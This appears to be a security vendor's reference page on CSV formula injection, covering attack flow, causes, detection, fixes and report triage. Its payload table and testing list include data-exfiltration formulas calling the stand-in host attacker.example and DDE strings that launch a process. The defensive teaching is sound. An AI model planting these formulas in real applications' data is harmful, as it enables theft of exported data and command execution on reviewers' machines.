Vulnerability

CSV Injection (Formula Injection)
detect, understand, remediate

CSV injection lets an attacker plant spreadsheet formulas inside data that the application later exports as a CSV, XLSX, or TSV file. When a user opens the export in Excel, LibreOffice Calc, or Google Sheets, the formula executes inside the spreadsheet, leading to data exfiltration, hyperlink phishing, and, on legacy DDE-enabled clients, command execution on the analyst workstation.

Get Started Free

No credit card required. Free plan available forever.

Severity

Medium

CWE ID

CWE-1236

OWASP Top 10

A03:2021 - Injection

CVSS 3.1 Score

6.5

What is CSV injection?

CSV injection, also called formula injection or Excel formula injection, is a vulnerability in which an attacker stores spreadsheet formulas inside fields that the application later exports as a CSV, XLSX, or TSV file. The exporting application is not the vulnerable target. The vulnerability triggers when another user opens the export in a desktop or web spreadsheet client. Excel, LibreOffice Calc, and Google Sheets each parse a leading equals sign as the start of a formula, and the formula runs with the privileges of the analyst, finance reviewer, or auditor who opened the file.

CSV injection is tracked under CWE-1236 (improper neutralisation of formula elements in a CSV file). It is most commonly recorded as a medium-severity finding because the impact depends on a downstream client behaviour the application cannot fully control. The two anchor exploits are data exfiltration through HYPERLINK and IMPORTXML formulas, and, on legacy Excel clients with Dynamic Data Exchange (DDE) enabled, command execution on the workstation. Modern Excel and Google Sheets restrict DDE and warn before opening external links, but the warning prompts are routinely dismissed by users who trust the source of the export.

Like stored XSS, CSV injection is a stored attack. The malicious payload sits in the database until the export endpoint is hit, and the victim is whichever role downloads and opens the file. Pentest findings have to capture the full chain: the stored input, the export endpoint, the spreadsheet client that interprets the formula, and the action the formula performs once it executes.

How it works

Plant the formula

The attacker submits a value beginning with =, +, -, @, or a tab character into any field the application stores: a customer name, a support ticket title, a company description, a product SKU, an OAuth client name. No special UI access is required; any text field that ends up in an export is in scope.

Wait for an export

A staff user, finance reviewer, or compliance auditor downloads a CSV report that contains the stored value. The export endpoint serializes the field unchanged. Many platforms surface CSV exports under headings like Customer Activity, Audit Log, or Subscription Report.

Trigger on open

The reviewer opens the CSV in Excel, LibreOffice Calc, or Google Sheets. The leading equals sign is interpreted as a formula. The cell now contains executing code, not data.

Execute the chain

The formula exfiltrates a cell value over HYPERLINK or IMPORTXML, opens a phishing URL on click, or, on a legacy Excel client with DDE enabled, launches a process. The action runs as the user who opened the file, not as the user who planted the payload.

Common formula payloads

Each row below is a payload pattern observed in real engagements. The first character is the trigger; the rest is the action. Authenticated scanners and manual testers should cover at least these classes before recording a finding as remediated.

Payload class	Example	Effect when opened
HYPERLINK exfiltration	=HYPERLINK("https://attacker.example/?d="&A1,"Click")	Renders a clickable link that leaks the value of cell A1 to the attacker on click. Phishing-style social engineering on top of formula execution.
External fetch (Sheets)	=IMPORTXML("https://attacker.example/","//x")	Google Sheets fetches the attacker URL with the user's session, exposing internal IP, locale, and a hit pattern useful for follow-on phishing.
DDE command (legacy Excel)	=cmd\|'/c calc'!A0	On Excel clients that have not patched out Dynamic Data Exchange, the cell launches a process. Modern Excel mitigates with prompts, but mitigations are only as strong as the user's answer to the dialog.
Plus, minus, at sign	+SUM(1+1) / -2+5+cmd\|'/c calc'!A0 / @SUM(1+1)*cmd...	Excel accepts +, -, and @ as formula triggers in addition to =. Sanitisation that only filters = leaves these vectors live.
Tab and CR prefix	\t=HYPERLINK(...)	A leading tab character is stripped on parse but the formula still executes. Filters that anchor on the first visible character miss this.
Hidden in concatenation	prefix=HYPERLINK(...)	Some clients do not require the formula trigger to be at the start of the cell when the cell is the result of a downstream concatenation across columns. Templated reports that build cells from multiple inputs can reintroduce a vulnerability that the export endpoint thought it had fixed.

Common causes

Stored input echoed into exports unchanged

The export endpoint serializes whatever the database has stored, with no awareness that the destination format treats some cells as code. Customer name, ticket title, support reply, and support attachment caption are the typical sources.

Sanitisation only at the input layer

Validation rejects a formula at form submission but the same field accepts the same value when written through the API, the bulk import endpoint, or a CSV ingestion path. The export endpoint reads the raw column and assumes earlier code already cleaned it.

Filtering only the equals sign

A filter strips leading = but allows +, -, @, and tab. Excel still treats those as formula triggers, so the partial filter ships the same finding under a slightly different payload.

Quoting CSV fields without escaping the trigger

Wrapping the cell in double quotes does not neutralise a formula. Excel still interprets =HYPERLINK(...) as a formula even when the cell is quoted in the source CSV. The fix has to neutralise the trigger character, not just escape the field.

Multi-format exports built from one template

A reporting pipeline that emits CSV, XLSX, and PDF from one template often gets PDF and XLSX right (because those go through a layout layer) while emitting CSV directly from the database. The least-protected format becomes the path of least resistance.

Trusting the destination application

Teams assume Excel and Google Sheets will warn the user. They do, but the warning is dismissed in routine workflows where the file is expected. Defensive engineering has to assume the warning will be clicked through.

How to detect it

Automated detection

SecPortal's authenticated scanner walks discovered export endpoints, plants formula payloads in fields that flow into CSV, XLSX, and TSV downloads, and inspects the rendered output for the trigger character.
Findings carry the seed payload, the export endpoint, the affected column, and the rendered cell so the chain is reproducible against the same asset weeks later during retest.
The findings database deduplicates against earlier CSV injection findings on the same column so a partial fix is not recorded as a new vulnerability.

Manual testing

Map every text input that the application persists. Customer name, ticket title, internal note, support reply, address line, OAuth client name, webhook description, and SAML attribute are all routinely re-emitted in CSV exports.
Plant marker formulas (=HYPERLINK, =IMPORTXML, =SUM(1+1), +SUM(1+1), -1+1, @SUM(1+1), and a tab-prefixed variant) and trigger every export the application offers: CSV, XLSX, TSV, and any analytics download.
Open each export in Excel, LibreOffice Calc, and Google Sheets. Note which clients fire the formula, which prompt, and which silently render the value. Treat the prompt as part of the impact statement, not as a clean bill of health.
Test fields that are concatenated into export cells from multiple columns. A fix on one source field can leave a sibling field unprotected, and the concatenated cell still produces a leading trigger character.

How to fix it

Neutralise trigger characters at export time

Prefix any cell that begins with =, +, -, @, tab, or carriage return with a single quote, or wrap the entire cell in a tab plus the value plus a tab. The single-quote prefix is the simplest and most portable: Excel, LibreOffice, and Google Sheets all treat the resulting cell as text. Apply the rule at the export serializer, not at the input layer, because input-layer fixes never cover all write paths.

Treat XLSX as a separate code path from CSV

Generating XLSX through a library that writes cell types explicitly (text vs formula) avoids the ambiguity entirely. A library that auto-detects the cell type from the value will still treat a leading = as a formula, so the same neutralisation has to apply on the way into the workbook.

Filter every trigger character, not just =

A filter that only blocks = leaves +, -, @, tab, and carriage return live. Cover the full set: ASCII 0x3D, 0x2B, 0x2D, 0x40, 0x09, 0x0D. Reject or escape on any of them at the start of a cell or at the start of a concatenation result.

Block control characters at submission time

Reject input that contains tab and carriage return characters in fields that are not supposed to carry whitespace formatting. Many CSV injection payloads rely on a tab prefix that survives display rendering but still triggers the formula on export.

Document the export contract

Treat every CSV, XLSX, and TSV export as a separate output contract that the security team reviews. A new export endpoint added to the dashboard must pass the same neutralisation rules as the original export, even when the underlying data has not changed.

Educate the recipient on the warning prompt

Internal staff who routinely open exports should be trained to take the spreadsheet client's formula prompts seriously. Process documentation that says click yes to enable links is the same documentation that disarms the strongest mitigation the operating system provides.

Where CSV injection shows up in real engagements

CSV injection is most often recorded against fields the application owners did not consider sensitive. The chains below describe how stored content moves into an export endpoint and ends up firing a formula in a downstream desktop client. Recognising these chains during triage matters more than any single payload, because the vulnerability lives in the data flow, not in the input form.

Support ticket export to finance

A customer plants =HYPERLINK in their company name during signup. The support team exports a CSV of all tickets each month for finance reconciliation. Finance opens the export in Excel and clicks the link; the click fires a request from inside the corporate network and exposes a row of the export to the attacker.

OAuth client name in audit log

An attacker registers an OAuth application with a name that begins with =IMPORTXML pointing at an attacker-controlled URL. An auditor downloads the OAuth registration log as a CSV; opening it in Google Sheets fires the IMPORTXML formula with the auditor's session cookie attached to the request.

CRM contact export

A field rep imports leads via CSV. The import accepts a contact whose company description contains a DDE payload. A different rep exports the contact list weeks later for a quarterly review and opens it in legacy Excel; the DDE fires before the user sees the cell content.

Subscription invoice export

A self-service customer sets their billing address to include a leading +. The billing system exports a CSV monthly; finance opens it in Excel; Excel parses the cell as a formula starting with +. A formula injection that began as a billing artefact lands as a stored client-side execution finding on the report.

Reporting and triage in the engagement

CSV injection is easy to dismiss as low-impact because the proof of concept is a spreadsheet cell with a formula in it. Credible reports walk the chain: which input field accepted the payload, which export endpoint serialized it, which spreadsheet clients fire the formula, and what the formula reaches once it executes. SecPortal's findings management stores the full evidence chain on the finding, so the link from stored input to client-side execution stays attached during retest rather than being reconstructed from the operator's notes.

Severity calibration matters. A formula that only renders as text in modern Excel and Google Sheets is informational; a HYPERLINK exfiltration that succeeds against the application's expected reviewer audience is medium; a DDE command that lands on a sales workstation under a default Excel install is high. The severity calibration research covers how to score this kind of chain finding without double-counting downstream client behaviour the application cannot enforce.

Retests have to walk every export endpoint, not just the field that produced the original finding. A new dashboard CSV added between the original test and the retest can reintroduce the vulnerability against a column the original test never planted into. The remediation tracking workflow keeps the export inventory attached to the retest so verification covers the full surface, and AI report generation turns the chain into a writeup the client's engineering team can act on without rebuilding the proof of concept.

Compliance impact